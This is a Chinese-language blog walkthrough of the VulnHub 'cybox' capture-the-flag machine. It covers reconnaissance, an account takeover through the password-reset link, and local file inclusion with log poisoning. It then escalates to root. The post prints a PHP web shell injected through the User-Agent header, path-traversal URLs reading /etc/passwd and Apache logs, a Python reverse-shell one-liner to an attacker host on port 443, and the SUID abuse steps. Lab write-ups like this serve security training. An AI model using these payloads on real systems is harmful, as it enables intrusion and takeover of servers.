vulnhub渗透测试之cybox

现在我们进入cybox。

我们把攻击机kali与靶机均在vmware下的NAT网段。

先信息收集

arp-scan -l

目标机ip为10.1.1.134

扫描端口信息

nmap -A -p- 10.1.1.134

我的模拟靶机环境远比不上现实环境,无多大所谓nmap速度,所以就习惯-A全部进行nmap探测了。

80端口的apache 2.2.17服务是有漏洞的。

打开10.1.1.134网页

 

 

发现域名信息

 admin@cybox.company

添加到 kali攻击机的/etc/hosts

 

 我准备采用目录猜解工具gobuster。该工具支持对子域名和Web目录进行基于字典的暴力扫描,具备优异的执行效率和并发性能。不同于其他工具,该工具支持同时多扩展名破解,适合采用多种后台技术的网站。实施子域名扫描时,该工具支持泛域名扫描,并允许用户强制继续扫描,以应对泛域名解析带来的影响。

apt install gobuster

gobuster有两种扫描模式,dir模式和dns模式,分别扫描目录和子域名,我们这里采用后者。

gobuster vhost -u http://cybox.company/ -w /usr/share/wordlists/dirb/big.txt

 

 用dirb目录爆破

将信息添加至kali的 /etc/hosts,用kali里的浏览器浏览

10.1.1.134  cybox.company

10.1.1.134  dev.cybox.company

10.1.1.134  ftp.cybox.company

10.1.1.134  register.cybox.company

10.1.1.134  monitor.cybox.company

10.1.1.134  webmail.cybox.company

 dev 为 phpinfo信息

 ftp 为 ftp 服务器

 register 为 一个创建用户的页面

 

 monitor监控

 

 webmail

 

 注册一个用户hhh

 

2、在 monitor 使用找回密码功能,此处可能存在越权登录

申请同名邮箱hhh@cybox.company,密码为hhh

 

 

 

 

 

 

将链接的hhh改为 admin,即可越权更改密码.,登录管理员账号

http://monitor.cybox.company/updatePasswordRequest.php?email=admin@cybox.company

 

 

 

 来到http://monitor.cybox.company/admin/index.php界面

 

 源代码为

可能存在文件包含

构造url测试

http://monitor.cybox.company/admin/styles.php?style=../../../../../../etc/passwd%00

注意末尾要加%00

 

查看apache日志

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00

发现了许多ftp请求

打开ftp,打开burpsuite抓包,刷新页面

User-Agent改成<?php system($_GET['h']);?>

构造url测试

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00&h=ifconfig

测试成功

构造攻击机10.1.1.128设置监听的url

目标机构造url反弹shell

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00&h=python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.103',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

到kali机监听

nc –nvlp 443

刷新页面得低权限shell

注意,这里的监听端口必须设为443。因为靶机设置了防火墙的进站和出站限制,除了白名单可以许可的端口外,都进行的限制,不能进行监听。所以不是白名单的端口,一般都会监听失败。

至于白名单,有几个常用的端口一般可能是白名单,不会限制进站和出站的。如53,80,443之类,可以一个个试。但53为dns端口解析域名,所以用此端口可能会造成域名解析混乱,不能显示监听结果,80被网站常规往来占用,不能监听。所以采用443,结果成功实现监听。

设置与页面常规交互风格

python -c "import pty;pty.spawn('/bin/bash');"

 

 用find / -perm -u=s -type f 2>/dev/null 查找有权限的文件,提权

cd /opt
ls -al

找到一个敏感文件/opt/register

打开发现是一个创建用户的文件。

还有一个/opt下的敏感文件registerlauncher即注册发射器,用此注册新用户具有高权限.

执行root权限注册发射执行器registerlauncher创建一个新用户sudo

./registerlauncher sudo

su sudo
sudo su root  #使得系统混淆用户sudo与提权命令sudo

 

 成功提权为root,拿下了root权限的shell

得到第一个flag

4c0183fdd736e2b8fb3f57ddbfa8ce36

得到第二个flag

d85da08f1a31ef96fb6d4f608611bca2

 

posted on 2021-07-15 14:50  miraitowa666  阅读(387)  评论(0)    收藏  举报

导航